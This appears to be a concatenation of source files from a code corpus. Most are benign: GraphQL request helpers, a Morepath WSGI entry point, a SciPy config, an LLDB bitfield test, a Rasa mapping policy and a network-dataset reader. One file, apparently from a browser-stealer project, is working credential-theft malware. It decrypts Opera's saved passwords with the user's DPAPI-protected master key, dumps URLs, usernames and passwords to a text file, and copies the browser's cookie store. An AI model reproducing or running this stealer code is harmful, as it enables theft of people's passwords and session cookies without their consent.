s = "Get obj request failed: " + str(e)
raise GetObjError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
        if 'errors' not in res:
if use_local_instance:
connector_name = make_lower(model_name)
if res['data'][connector_name]:
return res['data'][connector_name]
else:
s = "Could not find object: %s" % (connector_name)
raise GetObjError(s)
if not secondaryKeyFunction:
return res['data'][connector_name]
if len(res['data'][connector_name]['items']) == 1:
return res['data'][connector_name]['items'][0]
else:
s = "Could not find object: secondaryKeyFunction: %s" % (connector_name)
raise GetObjError(s)
else:
s = "Failed to get objects: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise GetObjError(s)
else:
s = "ERROR: Failed to get objects: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise GetObjError(s)
# Get all the objects of a given model from a given starting point
def get_objs(endpoint, starting_from, id_token, model_name, filter,
secondaryKeyFunction=False, custom_query=None,
queries_module=None, use_local_instance=False,
custom_query_filter=None):
# Get the header
auth_header = get_auth_header(id_token,
use_local_instance=use_local_instance)
if not queries_module:
queries_module = Queries
# Set the input for list objects query
limit_count = 100
vars = {}
if use_local_instance:
if filter:
vars['filter'] = convert_filter(filter)
vars['skip'] = starting_from
vars['take'] = limit_count
else:
vars = {"limit": limit_count, "nextToken": starting_from}
if (filter):
vars['filter'] = filter
if custom_query_filter:
vars.update(custom_query_filter)
if secondaryKeyFunction:
connector_name = model_name
updated_model_name = model_name
else:
updated_model_name = model_name[0].upper() + model_name[1:]
connector_name = "list" + updated_model_name + "s"
if use_local_instance:
updated_model_name = capitalize(model_name)
connector_name = 'list' + plural(updated_model_name)
connector = Localops.LOCALOPS[connector_name.lower()]
connector_name = plural(make_lower(model_name))
elif custom_query:
connector = custom_query
else:
connector = queries_module.QUERIES[connector_name.lower()]
# Send the POST request. All queries & mutations are sent
# as a post request in aws-amplify/graphql, in JSON format.
try:
r = requests.post(endpoint, headers=auth_header,
json={"query": connector, "variables": vars})
res = load_content(r.content)
except Exception as e:
s = "List objects request failed: " + str(e)
raise ListObjectsError(s)
if r.status_code == 200:
# Even if the return code was 200, we could still have errors.
        if 'errors' not in res:
#print "Got Connectors"
#print res['data']['listConnectorss']['items']
if use_local_instance:
if len(res['data'][connector_name]) == limit_count:
nextToken = starting_from + limit_count
else:
nextToken = 0
return (res['data'][connector_name], nextToken)
else:
return (res['data'][connector_name]['items'],
res['data'][connector_name]['nextToken'])
else:
s = "Failed to get objects: " + updated_model_name \
+ " ERROR: " + res['errors'][0]['message']
raise ListObjectsError(s)
else:
s = "ERROR: Failed to get objects: %s CODE: %d REASON: %s MSG: %s" % (updated_model_name, r.status_code, r.reason, res['errors'][0]['message'])
raise ListObjectsError(s)
def get_model_objects(endpoint, id_token, model_name, filter,
secondaryKeyFunction=False, custom_query=None,
queries_module=None, use_local_instance=False):
next_token = None
obj_list = []
while True:
try:
tmp_obj_list, next_token = get_objs(endpoint, next_token,
id_token, model_name, filter,
secondaryKeyFunction=secondaryKeyFunction,
custom_query=custom_query,
queries_module=queries_module,
use_local_instance=use_local_instance)
obj_list = obj_list + tmp_obj_list
if not next_token:
return obj_list
except ListObjectsError as e:
print("ERROR: %s" % (str(e)))
raise
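# Pagination sketch (hypothetical arguments): get_model_objects drives the
# nextToken loop above and returns the accumulated list.
#   devices = get_model_objects(endpoint, id_token, "device", None)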
def remove_model_objects(endpoint, id_token, model_name, obj_list,
custom_query=None, mutations_module=None):
for tmp_obj in obj_list:
try:
remove_obj(endpoint, id_token, model_name, tmp_obj,
custom_query=custom_query, mutations_module=mutations_module)
except:
pprint.pprint(tmp_obj)
traceback.print_exc()
raise
def insert_model_objects(endpoint, id_token, model_name, obj_list,
custom_query=None, mutations_module=None):
for tmp_obj in obj_list:
insert_obj(endpoint, id_token, model_name, tmp_obj,
custom_query=custom_query, mutations_module=mutations_module)
def update_model_objects(endpoint, id_token, model_name,
obj_list, custom_query=None, mutations_module=None):
for tmp_obj in obj_list:
update_obj(endpoint, id_token, model_name, tmp_obj,
custom_query=custom_query, mutations_module=mutations_module)
# Compress a provided string with the zlib codec (note: despite the name,
# this does not produce a gzip file container)
def gzip_string(input_str):
    if six.PY3 and isinstance(input_str, str):
        input_str = input_str.encode()
    return codecs.encode(input_str, 'zlib')
# Decompress a zlib-compressed byte string
def gunzip_bytes(input_bytes):
    return codecs.decode(input_bytes, 'zlib')
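# Round-trip sketch: the pair above is symmetric for bytes payloads.
#   payload = gzip_string("hello world")
#   assert gunzip_bytes(payload) == b"hello world"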
def b64encode(input_bytes):
return base64.b64encode(input_bytes)
def b64decode(input_str):
return base64.b64decode(input_str)
| 37.420613
| 153
| 0.64039
|
4a144c98eebd76e4b473bc6c90c5445dbddd0fdd
| 928
|
py
|
Python
|
conduit/run.py
|
yacoma/morepath-realworld-example-app
|
65f24dba26e133f7a920832f681fc12ba6a0a522
|
[
"MIT"
] | 5
|
2018-06-08T07:35:22.000Z
|
2020-01-04T20:55:16.000Z
|
conduit/run.py
|
yacoma/morepath-realworld-example-app
|
65f24dba26e133f7a920832f681fc12ba6a0a522
|
[
"MIT"
] | 2
|
2018-06-08T07:35:02.000Z
|
2018-06-11T21:12:30.000Z
|
conduit/run.py
|
yacoma/morepath-realworld-example-app
|
65f24dba26e133f7a920832f681fc12ba6a0a522
|
[
"MIT"
] | null | null | null |
import os
from webob.dec import wsgify
from webob.exc import HTTPNotFound
import morepath
from conduit import App, ProductionApp, TestApp
from conduit.database import db
def setup_db(app):
db_params = app.settings.database.__dict__.copy()
db.bind(**db_params)
db.generate_mapping(create_tables=True)
def wsgi_factory(): # pragma: no cover
morepath.autoscan()
if os.getenv("RUN_ENV") == "production":
ProductionApp.commit()
app = ProductionApp()
elif os.getenv("RUN_ENV") == "test":
TestApp.commit()
app = TestApp()
else:
App.commit()
app = App()
setup_db(app)
@wsgify
def run_morepath(request):
popped = request.path_info_pop()
if popped == "api":
return request.get_response(app)
else:
raise HTTPNotFound
return run_morepath
application = wsgi_factory() # pragma: no cover
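# Serving sketch (assumed external WSGI server, e.g. waitress; not part of
# this module):
#   waitress-serve conduit.run:application
# Morepath then handles requests under the "/api" prefix popped above.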
| 21.090909
| 53
| 0.643319
|
4a144d4241a62ca7e822589fbe02db5bdc780eab
| 962
|
py
|
Python
|
Skimage_numpy/source/scipy/__config__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | 1
|
2019-06-27T12:09:44.000Z
|
2019-06-27T12:09:44.000Z
|
Skimage_numpy/source/scipy/__config__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | null | null | null |
Skimage_numpy/source/scipy/__config__.py
|
Con-Mi/lambda-packs
|
b23a8464abdd88050b83310e1d0e99c54dac28ab
|
[
"MIT"
] | null | null | null |
# This file is generated by /tmp/pip-gyg03j-build/-c
# It contains system_info results at the time of building this package.
__all__ = ["get_info","show"]
lapack_opt_info={'libraries': ['openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'f77'}
openblas_info={'libraries': ['openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'f77'}
blas_opt_info={'libraries': ['openblas'], 'library_dirs': ['/usr/local/lib'], 'language': 'f77'}
def get_info(name):
g = globals()
return g.get(name, g.get(name + "_info", {}))
def show():
for name,info_dict in globals().items():
if name[0] == "_" or type(info_dict) is not type({}): continue
print(name + ":")
if not info_dict:
print(" NOT AVAILABLE")
for k,v in info_dict.items():
v = str(v)
if k == "sources" and len(v) > 200:
v = v[:60] + " ...\n... " + v[-60:]
print(" %s = %s" % (k,v))
| 40.083333
| 98
| 0.561331
|
4a144d5e80c65ab496e29306bfd0dbc2a6ca6bb3
| 8,411
|
py
|
Python
|
lldb/test/API/lang/c/bitfields/TestBitfields.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 605
|
2019-10-18T01:15:54.000Z
|
2022-03-31T14:31:04.000Z
|
lldb/test/API/lang/c/bitfields/TestBitfields.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 3,180
|
2019-10-18T01:21:21.000Z
|
2022-03-31T23:25:41.000Z
|
lldb/test/API/lang/c/bitfields/TestBitfields.py
|
mkinsner/llvm
|
589d48844edb12cd357b3024248b93d64b6760bf
|
[
"Apache-2.0"
] | 275
|
2019-10-18T05:27:22.000Z
|
2022-03-30T09:04:21.000Z
|
"""Test C bitfields."""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class TestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def run_to_main(self):
self.build()
lldbutil.run_to_source_breakpoint(self, "// break here", lldb.SBFileSpec("main.c"))
# BitFields exhibit crashes in record layout on Windows
# (http://llvm.org/pr21800)
@skipIfWindows
def test_bits(self):
self.run_to_main()
# Check each field of Bits.
bits_children = [
ValueCheck(type="int:1"), # Unnamed and uninitialized
ValueCheck(type="uint32_t:1", name="b1", value="1"),
ValueCheck(type="uint32_t:2", name="b2", value="3"),
ValueCheck(type="int:2"), # Unnamed and uninitialized
ValueCheck(type="uint32_t:3", name="b3", value="7"),
ValueCheck(type="uint32_t", name="b4", value="15"),
ValueCheck(type="uint32_t:5", name="b5", value="31"),
ValueCheck(type="uint32_t:6", name="b6", value="63"),
ValueCheck(type="uint32_t:7", name="b7", value="127"),
ValueCheck(type="uint32_t:4", name="four", value="15")
]
self.expect_var_path("bits", type="Bits", children=bits_children)
self.expect_expr("bits", result_children=bits_children)
# Try accessing the different fields using the expression evaluator.
self.expect_expr("bits.b1", result_type="uint32_t", result_value="1")
self.expect_expr("bits.b2", result_type="uint32_t", result_value="3")
self.expect_expr("bits.b3", result_type="uint32_t", result_value="7")
self.expect_expr("bits.b4", result_type="uint32_t", result_value="15")
self.expect_expr("bits.b5", result_type="uint32_t", result_value="31")
self.expect_expr("bits.b6", result_type="uint32_t", result_value="63")
self.expect_expr("bits.b7", result_type="uint32_t", result_value="127")
self.expect_expr("bits.four", result_type="uint32_t", result_value="15")
# Try accessing the different fields using variable paths.
self.expect_var_path("bits.b1", type="uint32_t:1", value="1")
self.expect_var_path("bits.b2", type="uint32_t:2", value="3")
self.expect_var_path("bits.b4", type="uint32_t", value="15")
self.expect_var_path("bits.b5", type="uint32_t:5", value="31")
self.expect_var_path("bits.b7", type="uint32_t:7", value="127")
# Check each field of MoreBits.
more_bits_children = [
ValueCheck(type="uint32_t:3", name="a", value="3"),
ValueCheck(type="int:1", value="0"),
ValueCheck(type="uint8_t:1", name="b", value="'\\0'"),
ValueCheck(type="uint8_t:1", name="c", value="'\\x01'"),
ValueCheck(type="uint8_t:1", name="d", value="'\\0'"),
]
self.expect_var_path("more_bits", type="MoreBits", children=more_bits_children)
self.expect_expr("more_bits", result_children=more_bits_children)
self.expect_expr("more_bits.a", result_type="uint32_t", result_value="3")
self.expect_expr("more_bits.b", result_type="uint8_t", result_value="'\\0'")
self.expect_expr("more_bits.c", result_type="uint8_t", result_value="'\\x01'")
self.expect_expr("more_bits.d", result_type="uint8_t", result_value="'\\0'")
# Test a struct with several single bit fields.
many_single_bits_children = [
ValueCheck(type="uint16_t:1", name="b1", value="1"),
ValueCheck(type="uint16_t:1", name="b2", value="0"),
ValueCheck(type="uint16_t:1", name="b3", value="0"),
ValueCheck(type="uint16_t:1", name="b4", value="0"),
ValueCheck(type="uint16_t:1", name="b5", value="1"),
ValueCheck(type="uint16_t:1", name="b6", value="0"),
ValueCheck(type="uint16_t:1", name="b7", value="1"),
ValueCheck(type="uint16_t:1", name="b8", value="0"),
ValueCheck(type="uint16_t:1", name="b9", value="0"),
ValueCheck(type="uint16_t:1", name="b10", value="0"),
ValueCheck(type="uint16_t:1", name="b11", value="0"),
ValueCheck(type="uint16_t:1", name="b12", value="0"),
ValueCheck(type="uint16_t:1", name="b13", value="1"),
ValueCheck(type="uint16_t:1", name="b14", value="0"),
ValueCheck(type="uint16_t:1", name="b15", value="0"),
ValueCheck(type="uint16_t:1", name="b16", value="0"),
ValueCheck(type="uint16_t:1", name="b17", value="0"),
]
self.expect_var_path("many_single_bits", type="ManySingleBits", children=many_single_bits_children)
self.expect_expr("many_single_bits", result_type="ManySingleBits",
result_children=many_single_bits_children)
# Check a packed struct.
self.expect_expr("packed.a", result_type="char", result_value="'a'")
self.expect_expr("packed.b", result_type="uint32_t", result_value="10")
self.expect_expr("packed.c", result_type="uint32_t", result_value=str(int("7112233", 16)))
# A packed struct with bitfield size > 32.
self.expect("v/x large_packed", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs=["a = 0x0000000cbbbbaaaa", "b = 0x0000000dffffeeee"])
# Check reading a bitfield through a pointer in various ways (PR47743)
self.expect("v/x large_packed_ptr->b",
substrs=["large_packed_ptr->b = 0x0000000dffffeeee"])
self.expect("v/x large_packed_ptr[0].b",
substrs=["large_packed_ptr[0].b = 0x0000000dffffeeee"])
# BitFields exhibit crashes in record layout on Windows
# (http://llvm.org/pr21800)
@skipIfWindows
def test_expression_bug(self):
# Ensure evaluating (emulating) an expression does not break bitfield
# values for already parsed variables. The expression is run twice
# because the very first expression can resume a target (to allocate
# memory, etc.) even if it is not being jitted.
self.run_to_main()
self.expect("v/x large_packed", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs=["a = 0x0000000cbbbbaaaa", "b = 0x0000000dffffeeee"])
self.expect("expr --allow-jit false -- more_bits.a", VARIABLES_DISPLAYED_CORRECTLY,
substrs=['uint32_t', '3'])
self.expect("v/x large_packed", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs=["a = 0x0000000cbbbbaaaa", "b = 0x0000000dffffeeee"])
self.expect("expr --allow-jit false -- more_bits.a", VARIABLES_DISPLAYED_CORRECTLY,
substrs=['uint32_t', '3'])
self.expect("v/x large_packed", VARIABLES_DISPLAYED_CORRECTLY,
                    substrs=["a = 0x0000000cbbbbaaaa", "b = 0x0000000dffffeeee"])
@add_test_categories(['pyapi'])
# BitFields exhibit crashes in record layout on Windows
# (http://llvm.org/pr21800)
@skipIfWindows
def test_and_python_api(self):
"""Use Python APIs to inspect a bitfields variable."""
self.run_to_main()
# Lookup the "bits" variable which contains 8 bitfields.
bits = self.frame().FindVariable("bits")
self.DebugSBValue(bits)
self.assertEqual(bits.GetTypeName(), 'Bits')
self.assertEqual(bits.GetNumChildren(), 10)
self.assertEqual(bits.GetByteSize(), 32)
# Notice the pattern of int(b1.GetValue(), 0). We pass a base of 0
# so that the proper radix is determined based on the contents of the
# string.
b1 = bits.GetChildMemberWithName("b1")
self.DebugSBValue(b1)
self.assertEqual(b1.GetName(), "b1")
self.assertEqual(b1.GetTypeName(), "uint32_t:1")
self.assertTrue(b1.IsInScope())
self.assertEqual(int(b1.GetValue(), 0), 1)
b7 = bits.GetChildMemberWithName("b7")
self.assertEqual(b7.GetName(), "b7")
self.assertEqual(b7.GetTypeName(), "uint32_t:7")
self.assertTrue(b7.IsInScope())
self.assertEqual(int(b7.GetValue(), 0), 127)
four = bits.GetChildMemberWithName("four")
self.assertEqual(four.GetName(), "four")
self.assertEqual(four.GetTypeName(), "uint32_t:4")
self.assertTrue(four.IsInScope())
self.assertEqual(int(four.GetValue(), 0), 15)
| 49.476471
| 107
| 0.628344
|
4a144d60c43e9a24cd3ce70b00e81e56f33e7c51
| 7,116
|
py
|
Python
|
rasa/core/policies/mapping_policy.py
|
Tao2301230/rasa_learn
|
50093cbc696ee72fec81ab69d74a80399c6277ca
|
[
"Apache-2.0"
] | 1
|
2020-09-23T11:04:38.000Z
|
2020-09-23T11:04:38.000Z
|
rasa/core/policies/mapping_policy.py
|
Tao2301230/rasa_learn
|
50093cbc696ee72fec81ab69d74a80399c6277ca
|
[
"Apache-2.0"
] | null | null | null |
rasa/core/policies/mapping_policy.py
|
Tao2301230/rasa_learn
|
50093cbc696ee72fec81ab69d74a80399c6277ca
|
[
"Apache-2.0"
] | null | null | null |
import logging
import json
import os
import typing
from typing import Any, List, Text, Optional
from rasa.constants import DOCS_URL_POLICIES, DOCS_URL_MIGRATION_GUIDE
import rasa.utils.io
from rasa.nlu.constants import INTENT_NAME_KEY
from rasa.utils import common as common_utils
from rasa.core.actions.action import (
ACTION_BACK_NAME,
ACTION_LISTEN_NAME,
ACTION_RESTART_NAME,
ACTION_SESSION_START_NAME,
)
from rasa.core.constants import (
USER_INTENT_BACK,
USER_INTENT_RESTART,
USER_INTENT_SESSION_START,
)
from rasa.core.domain import Domain, InvalidDomain
from rasa.core.events import ActionExecuted
from rasa.core.interpreter import NaturalLanguageInterpreter
from rasa.core.policies.policy import Policy
from rasa.core.trackers import DialogueStateTracker
from rasa.core.training.generator import TrackerWithCachedStates
from rasa.core.constants import MAPPING_POLICY_PRIORITY
import rasa.shared.utils.io
if typing.TYPE_CHECKING:
from rasa.core.policies.ensemble import PolicyEnsemble
logger = logging.getLogger(__name__)
class MappingPolicy(Policy):
"""Policy which maps intents directly to actions.
Intents can be assigned actions in the domain file which are to be
executed whenever the intent is detected. This policy takes precedence over
any other policy.
"""
@staticmethod
def _standard_featurizer() -> None:
return None
def __init__(self, priority: int = MAPPING_POLICY_PRIORITY) -> None:
"""Create a new Mapping policy."""
super().__init__(priority=priority)
common_utils.raise_deprecation_warning(
f"'{MappingPolicy.__name__}' is deprecated and will be removed in "
"the future. It is recommended to use the 'RulePolicy' instead.",
docs=DOCS_URL_MIGRATION_GUIDE,
)
@classmethod
def validate_against_domain(
cls, ensemble: Optional["PolicyEnsemble"], domain: Optional[Domain]
) -> None:
if not domain:
return
has_mapping_policy = ensemble is not None and any(
isinstance(p, cls) for p in ensemble.policies
)
has_triggers_in_domain = any(
[
"triggers" in properties
for intent, properties in domain.intent_properties.items()
]
)
if has_triggers_in_domain and not has_mapping_policy:
raise InvalidDomain(
"You have defined triggers in your domain, but haven't "
"added the MappingPolicy to your policy ensemble. "
"Either remove the triggers from your domain or "
"exclude the MappingPolicy from your policy configuration."
)
def train(
self,
training_trackers: List[TrackerWithCachedStates],
domain: Domain,
interpreter: NaturalLanguageInterpreter,
**kwargs: Any,
) -> None:
"""Does nothing. This policy is deterministic."""
pass
def predict_action_probabilities(
self,
tracker: DialogueStateTracker,
domain: Domain,
interpreter: NaturalLanguageInterpreter,
**kwargs: Any,
) -> List[float]:
"""Predicts the assigned action.
If the current intent is assigned to an action that action will be
predicted with the highest probability of all policies. If it is not
the policy will predict zero for every action."""
result = self._default_predictions(domain)
intent = tracker.latest_message.intent.get(INTENT_NAME_KEY)
if intent == USER_INTENT_RESTART:
action = ACTION_RESTART_NAME
elif intent == USER_INTENT_BACK:
action = ACTION_BACK_NAME
elif intent == USER_INTENT_SESSION_START:
action = ACTION_SESSION_START_NAME
else:
action = domain.intent_properties.get(intent, {}).get("triggers")
if tracker.latest_action_name == ACTION_LISTEN_NAME:
# predict mapped action
if action:
idx = domain.index_for_action(action)
if idx is None:
rasa.shared.utils.io.raise_warning(
f"MappingPolicy tried to predict unknown "
f"action '{action}'. Make sure all mapped actions are "
f"listed in the domain.",
docs=DOCS_URL_POLICIES + "#mapping-policy",
)
else:
result[idx] = 1
if any(result):
logger.debug(
"The predicted intent '{}' is mapped to "
" action '{}' in the domain."
"".format(intent, action)
)
elif tracker.latest_action_name == action and action is not None:
# predict next action_listen after mapped action
latest_action = tracker.get_last_event_for(ActionExecuted)
assert latest_action.action_name == action
if latest_action.policy and latest_action.policy.endswith(
type(self).__name__
):
# this ensures that we only predict listen,
# if we predicted the mapped action
logger.debug(
"The mapped action, '{}', for this intent, '{}', was "
"executed last so MappingPolicy is returning to "
"action_listen.".format(action, intent)
)
idx = domain.index_for_action(ACTION_LISTEN_NAME)
result[idx] = 1
else:
logger.debug(
"The mapped action, '{}', for the intent, '{}', was "
"executed last, but it was predicted by another policy, '{}', "
"so MappingPolicy is not predicting any action.".format(
action, intent, latest_action.policy
)
)
elif action == ACTION_RESTART_NAME:
logger.debug("Restarting the conversation with action_restart.")
idx = domain.index_for_action(ACTION_RESTART_NAME)
result[idx] = 1
else:
logger.debug(
"There is no mapped action for the predicted intent, "
"'{}'.".format(intent)
)
return result
def persist(self, path: Text) -> None:
"""Only persists the priority."""
config_file = os.path.join(path, "mapping_policy.json")
meta = {"priority": self.priority}
rasa.utils.io.create_directory_for_file(config_file)
rasa.utils.io.dump_obj_as_json_to_file(config_file, meta)
@classmethod
def load(cls, path: Text) -> "MappingPolicy":
"""Returns the class with the configured priority."""
meta = {}
if os.path.exists(path):
meta_path = os.path.join(path, "mapping_policy.json")
if os.path.isfile(meta_path):
meta = json.loads(rasa.utils.io.read_file(meta_path))
return cls(**meta)
| 36.121827
| 83
| 0.61172
|
4a144d61db1d5d0758ebe119303d64721843ceb3
| 3,208
|
py
|
Python
|
stink/browsers/opera_default.py
|
WolfInChains/Browsers-Stealer
|
98eefc39e8b59eb61ca3b17b7fc5b7964c892c6e
|
[
"MIT"
] | 4
|
2020-06-24T15:46:35.000Z
|
2021-05-17T13:20:51.000Z
|
stink/browsers/opera_default.py
|
faritpro/stink
|
98eefc39e8b59eb61ca3b17b7fc5b7964c892c6e
|
[
"MIT"
] | 3
|
2021-03-31T19:51:32.000Z
|
2021-06-04T13:23:22.000Z
|
stink/browsers/opera_default.py
|
faritpro/stink
|
98eefc39e8b59eb61ca3b17b7fc5b7964c892c6e
|
[
"MIT"
] | 3
|
2020-10-15T12:37:10.000Z
|
2021-04-05T12:58:48.000Z
|
from json import loads
from sqlite3 import connect
from shutil import copyfile
from base64 import b64decode
from os import environ, sep, path, remove, mkdir
from Crypto.Cipher import AES
from win32crypt import CryptUnprotectData
class Opera_Default:
def __init__(self, storage_path: str, storage_folder: str, browser_folder: str, errors: bool):
self.storage_path = storage_path
self.storage_folder = storage_folder
self.browser_folder = browser_folder
self.errors = errors
self.state_path = environ['USERPROFILE'] + sep + r'AppData\Roaming\Opera Software\Opera Stable\Local State'
self.cookies_path = environ['USERPROFILE'] + sep + r'AppData\Roaming\Opera Software\Opera Stable\Cookies'
self.passwords_path = environ['USERPROFILE'] + sep + r'AppData\Roaming\Opera Software\Opera Stable\Login Data'
def __check_files(self):
if (path.exists(self.passwords_path)) is True or (path.exists(self.cookies_path)) is True:
mkdir(f"{self.storage_path}{self.storage_folder}{self.browser_folder}")
def __get_key(self):
with open(self.state_path, "r", encoding='utf-8') as state:
local_state = loads(state.read())
return CryptUnprotectData(b64decode(local_state["os_crypt"]["encrypted_key"])[5:], None, None, None, 0)[1]
def __decrypt_password(self, buff, master_key):
try:
return AES.new(master_key, AES.MODE_GCM, buff[3:15]).decrypt(buff[15:])[:-16].decode()
except:
return "Old version"
def __write_passwords(self, cursor, master_key):
with open(f"{self.storage_path}{self.storage_folder}{self.browser_folder}/Opera Default Passwords.txt", "a", encoding='utf-8') as passwords:
results = cursor.execute("SELECT action_url, username_value, password_value FROM logins").fetchall()
for result in results:
password = self.__decrypt_password(result[2], master_key)
if (result[0], result[1], password) != ("", "", ""):
passwords.write(f"URL: {result[0]}\nUsername: {result[1]}\nPassword: {password}\n\n")
else:
continue
passwords.close()
def run(self):
try:
self.__check_files()
if (path.exists(self.passwords_path)) is True:
master_key = self.__get_key()
copyfile(self.passwords_path, f"{self.storage_path}Opera_Default.db")
with connect(f"{self.storage_path}Opera_Default.db") as connection:
cursor = connection.cursor()
self.__write_passwords(cursor, master_key)
cursor.close()
connection.close()
if (path.exists(self.cookies_path)) is True:
copyfile(self.cookies_path, f"{self.storage_path}{self.storage_folder}{self.browser_folder}/Opera Default Cookies", follow_symlinks=True)
remove(f"{self.storage_path}Opera_Default.db")
except Exception as e:
if self.errors is True:
print(f"[OPERA_DEFAULT]: {repr(e)}")
else:
pass
| 31.45098
| 153
| 0.632793
|
4a144e58836677b20381a2367b357b8e38ea8351
| 594
|
py
|
Python
|
causalimpact/__version__.py
|
abinba/tfcausalimpact
|
5aba01435c6a56e41af294beea0128b70a7f6a10
|
[
"Apache-2.0"
] | null | null | null |
causalimpact/__version__.py
|
abinba/tfcausalimpact
|
5aba01435c6a56e41af294beea0128b70a7f6a10
|
[
"Apache-2.0"
] | null | null | null |
causalimpact/__version__.py
|
abinba/tfcausalimpact
|
5aba01435c6a56e41af294beea0128b70a7f6a10
|
[
"Apache-2.0"
] | null | null | null |
# Copyright WillianFuks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__version__ = '0.0.2'
| 34.941176
| 74
| 0.757576
|
4a14506c983156539ffeca40df4f28955c5f277a
| 41,173
|
py
|
Python
|
datanetAPI.py
|
ihounie/datanetAPI
|
0c8a9c753dd058ac3bf0ae6329d08c4b8268b834
|
[
"Apache-2.0"
] | null | null | null |
datanetAPI.py
|
ihounie/datanetAPI
|
0c8a9c753dd058ac3bf0ae6329d08c4b8268b834
|
[
"Apache-2.0"
] | null | null | null |
datanetAPI.py
|
ihounie/datanetAPI
|
0c8a9c753dd058ac3bf0ae6329d08c4b8268b834
|
[
"Apache-2.0"
] | null | null | null |
'''
*
* Copyright (C) 2020 Universitat Politècnica de Catalunya.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
'''
# -*- coding: utf-8 -*-
import os, tarfile, numpy, math, networkx, queue, random,traceback, wget
from enum import IntEnum
from extract import ExtractNested
import timeit
def extract_nested(file_path):
ExtractNested(file_path)
#os.system(f"tar -xfv {file_path}")
#os.system("find . -name \""+file_path+"*.tar.gz\" -exec tar xzf {} \;")
def download_dataset(data_folder,
base_url = "https://bnn.upc.edu/download/",
files = ["ch21-training-dataset", "ch21-validation-dataset"]):
    for file in files:
        file_path = os.path.join(data_folder, file)
        if os.path.exists(file_path):
            print('File %s exists, skipping...' % file)
            continue
        elif os.path.exists(file_path+".tar.gz"):
            print('File %s.tar.gz exists, extracting...' % file)
            extract_nested(file_path+".tar.gz")
            continue
        print('Downloading file: ', file)
        www_path = os.path.join(base_url, file)
        wget.download(www_path, out=file_path+".tar.gz")
        print('Extracting File: ', file)
        # Extract the archive just downloaded (wget wrote it with the
        # .tar.gz suffix above).
        extract_nested(file_path+".tar.gz")
print('Done Downloading and Extracting Dataset!')
class DatanetException(Exception):
"""
Exceptions generated when processing dataset
"""
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
class TimeDist(IntEnum):
"""
Enumeration of the supported time distributions
"""
EXPONENTIAL_T = 0
DETERMINISTIC_T = 1
UNIFORM_T = 2
NORMAL_T = 3
ONOFF_T = 4
PPBP_T = 5
@staticmethod
def getStrig(timeDist):
if (timeDist == 0):
return ("EXPONENTIAL_T")
elif (timeDist == 1):
return ("DETERMINISTIC_T")
elif (timeDist == 2):
return ("UNIFORM_T")
elif (timeDist == 3):
return ("NORMAL_T")
elif (timeDist == 4):
return ("ONOFF_T")
elif (timeDist == 5):
return ("PPBP_T")
else:
return ("UNKNOWN")
class SizeDist(IntEnum):
"""
Enumeration of the supported size distributions
"""
DETERMINISTIC_S = 0
UNIFORM_S = 1
BINOMIAL_S = 2
GENERIC_S = 3
@staticmethod
def getStrig(sizeDist):
if (sizeDist == 0):
return ("DETERMINISTIC_S")
elif (sizeDist == 1):
return ("UNIFORM_S")
elif (sizeDist == 2):
return ("BINOMIAL_S")
elif (sizeDist ==3):
return ("GENERIC_S")
else:
return ("UNKNOWN")
class Sample:
"""
Class used to contain the results of a single iteration in the dataset
reading process.
...
Attributes
----------
global_packets : double
        Overall number of packets transmitted in the network
    global_losses : double
        Overall number of packets lost in the network
    global_delay : double
        Overall delay in the network
maxAvgLambda: double
This variable is used in our simulator to define the overall traffic
intensity of the network scenario
performance_matrix : NxN matrix
Matrix where each cell [i,j] contains aggregated and flow-level
information about transmission parameters between source i and
destination j.
traffic_matrix : NxN matrix
Matrix where each cell [i,j] contains aggregated and flow-level
information about size and time distributions between source i and
destination j.
routing_matrix : NxN matrix
Matrix where each cell [i,j] contains the path, if it exists, between
source i and destination j.
topology_object :
Network topology using networkx format.
links_performance: list-of-dict-of-dict data structure:
        The outer list contains a dict-of-dicts for each node: the first dict
        holds the adjacent nodes and the last dict holds the parameters of the link.
"""
global_packets = None
global_losses = None
global_delay = None
maxAvgLambda = None
performance_matrix = None
traffic_matrix = None
routing_matrix = None
topology_object = None
links_performance = None
data_set_file = None
_results_line = None
_traffic_line = None
_input_files_line = None
_status_line = None
_flowresults_line = None
_link_usage_line = None
_routing_file = None
_graph_file = None
def get_global_packets(self):
"""
Return the number of packets transmitted in the network per time unit of this Sample instance.
"""
return self.global_packets
def get_global_losses(self):
"""
Return the number of packets dropped in the network per time unit of this Sample instance.
"""
return self.global_losses
def get_global_delay(self):
"""
Return the average per-packet delay over all the packets transmitted in the network in time units
of this sample instance.
"""
return self.global_delay
def get_maxAvgLambda(self):
"""
        Returns the maxAvgLambda used in the current iteration. This variable is used in our simulator to define
the overall traffic intensity of the network scenario.
"""
return self.maxAvgLambda
def get_performance_matrix(self):
"""
Returns the performance_matrix of this Sample instance.
"""
return self.performance_matrix
